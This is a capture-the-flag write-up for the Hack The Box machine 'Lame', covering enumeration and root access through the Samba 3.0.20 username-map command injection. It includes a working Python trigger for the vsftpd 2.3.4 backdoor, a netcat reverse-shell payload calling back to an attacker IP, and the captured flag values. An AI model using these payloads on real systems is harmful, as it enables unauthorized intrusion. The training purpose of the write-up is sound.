Recon
What we know before interacting with the box:
- Name: LAME
- IP: 10.10.10.3
- Level: Very easy
- OS: Linux
- Flag: 2 (User and Root Flag)
- Hint: a common, real-world vulnerability; possibly related to the previous box.
- Attacker IP: 10.10.16.223
Enumeration
First, run an initial nmap scan with service/version detection (-sV) and the aggressive option set (-A):
nmap -sV -A 10.10.10.3
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
| OS: Unix (Samba 3.0.20-Debian)
| Domain name: hackthebox.gr
| FQDN: lame.hackthebox.gr
|_ System time: 2021-08-26T13:12:53-04:00
Recap
- Domain: hackthebox.gr
- vsftpd 2.3.4 running on port 21
- OpenSSH 4.7p1 running on port 22
- Ports 139 and 445 serve SMB. This is not a Windows SMB service but Samba on Linux; the version is Samba smbd 3.0.20-Debian.
Pentest FTP
As the FTP server allows anonymous login, I try the FTP connection first.
(kali) ftp 10.10.10.3

It looks like some filter prevents me from accessing the data. There is nothing here.

Search Google for an exploit for vsftpd 2.3.4.

I tried a Python exploit for vsftpd 2.3.4 (the well-known backdoor in that release, which is supposed to open a root shell on TCP port 6200 when the FTP username contains ":)"), but it did not work.
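What that vsftpd 2.3.4 exploit actually tries, shown here as an added example of my own rather than the script used above: the backdoored build starts a shell listening on TCP port 6200 once an FTP USER name containing ":)" is followed by a PASS. The probe below sends that trigger and then checks whether 6200 started listening, so a non-working backdoor shows up as a clear "no" instead of a hung exploit. The host is a parameter (10.10.10.3 is this box), 6200 is the backdoor's known port, and the user name, timeouts and the two-second wait are my own choices.

```python
"""Probe for the vsftpd 2.3.4 backdoor (added example, not the write-up's script).

Trigger: FTP USER containing ":)" then any PASS. Effect on a backdoored build:
a root shell is bound on TCP/6200. This only reports whether 6200 opened.
"""
import socket

FTP_PORT = 21
BACKDOOR_PORT = 6200          # port the vsftpd 2.3.4 backdoor listens on


def trigger_messages(user: str = "hacker") -> list:
    """FTP commands that trigger the backdoor: a USER containing ':)'
    followed by a PASS (the password value does not matter)."""
    return [f"USER {user}:)\r\n".encode(), b"PASS pass\r\n"]


def port_open(host: str, port: int, timeout: float = 3.0) -> bool:
    """True if a TCP connect to host:port succeeds within timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def send_trigger(host: str, timeout: float = 5.0) -> str:
    """Connect to FTP, read the banner, send the trigger, return the banner."""
    with socket.create_connection((host, FTP_PORT), timeout=timeout) as s:
        banner = s.recv(1024).decode(errors="replace").strip()
        for msg in trigger_messages():
            s.sendall(msg)
        # A backdoored build does not answer PASS normally; waiting briefly
        # (assumed 2 s) gives it time to bind 6200 before we probe.
        s.settimeout(2.0)
        try:
            s.recv(1024)
        except OSError:
            pass
    return banner


def probe(host: str) -> dict:
    """Return the FTP banner and whether 6200 was open before/after the trigger."""
    before = port_open(host, BACKDOOR_PORT)
    banner = send_trigger(host)
    after = port_open(host, BACKDOOR_PORT)
    return {"banner": banner, "backdoor_before": before, "backdoor_after": after}


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "10.10.10.3"
    result = probe(target)
    print(result["banner"])
    print("6200 open after trigger:", result["backdoor_after"])
```

If backdoor_after is True, `nc 10.10.10.3 6200` gives the shell; if it stays False after a correct banner, the trigger reached the service but no listener appeared, which is the outcome this write-up reports.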
Pentest SMB
I used smbmap to check for public shares.

We can READ and WRITE to the tmp share. I used smbclient to access this share but got an error.

I searched Google for this error message and found a solution.

Now smbclient works properly.

I checked the files on the tmp share but found no useful information.

Exploit Samba 3.0.20
Searching Google for an exploit for Samba 3.0.20, I found a Python script: macha97/exploit-smb-3.0.20 on GitHub.

This script requires a payload created with msfvenom (the cmd/unix/reverse_netcat module produces a string of the form shown below).

The buf string is just a reverse shell built from nc and a named pipe:
(buf) mkfifo /tmp/cewoh; nc 10.10.16.223 4444 0</tmp/cewoh | /bin/sh >/tmp/cewoh 2>&1; rm /tmp/cewoh
The complete exploit script looks like this:

Run it with python3.

And I got a shell on the netcat listener.

Great, the shell is already root, so I can grab the user flag and the root flag at once. There are several users under /home.

I search for .txt files to find the user flag quickly.

(user flag) 83f38774483206d7c54299b9dd2e3a89
And the root flag is at /root/root.txt as usual.

(root flag) 3bc8b537695679e5eb8cb0aeb9e2cb13
Lessons learned
- SMB (ports 139 and 445) is not Windows-only; Samba provides it on Linux.
- Samba 3.0.20 has a critical bug (CVE-2007-2447, command injection through the "username map script" option) that gives unauthenticated remote code execution as root.
References
https://book.hacktricks.xyz/pentesting/pentesting-ftp
https://book.hacktricks.xyz/pentesting/pentesting-smb
https://serverfault.com/questions/137135/what-does-nt-status-bad-network-name-mean-in-samba
https://github.com/macha97/exploit-smb-3.0.20/blob/master/exploit-smb-3.0.20.py